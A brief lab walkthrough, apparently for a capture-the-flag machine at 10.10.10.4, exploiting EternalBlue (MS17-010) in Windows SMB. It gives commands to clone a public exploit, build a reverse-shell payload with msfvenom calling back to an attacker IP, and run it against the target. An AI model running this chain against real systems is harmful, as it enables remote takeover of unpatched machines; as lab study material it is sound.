Exploitation

10.10.10.4

Eternal Blue

This vulnerability exploited Microsoft's implementation of Server Message Block (SMB) protocol, where if an attacker sent a specially crafted packet, the attacker would be allowed to execute arbitrary code on the target machine.

Download Exploit code from GitHub

git clone https://github.com/helviojunior/MS17-010.git

Use MSFVenom to create a reverse shell payload

msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.34 LPORT=4444 -f exe > eternalblue.exe
  • Set up listener on your attacker machine

Run the exploit

python send_and_execute.py 10.10.10.4 ~/Desktop/eternalblue.exe

Last updated

Was this helpful?